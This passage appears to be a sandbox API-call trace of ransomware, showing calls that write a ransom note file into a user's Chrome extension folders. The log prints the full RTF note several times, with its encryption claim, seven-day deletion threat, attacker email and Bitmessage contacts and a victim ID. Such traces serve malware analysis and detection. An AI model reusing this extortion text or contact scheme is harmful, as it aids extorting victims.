n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1ef5068, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nzráb\x95.ê©ÀAH\x01¹HÂP[w.\x80¬Ñ%cD", lpUsedDefaultChar=0x0) returned 8717 [0278.563] WriteFile (in: hFile=0x2c8, lpBuffer=0x1ef5068*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1ef5068*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0278.563] CloseHandle (hObject=0x2c8) returned 1 [0278.564] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ro\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ro\\#readme_eman#.rtf")) returned 0xffffffff [0278.564] GetLastError () returned 0x2 [0278.564] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ro\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ro\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c8 [0278.564] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0278.564] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, 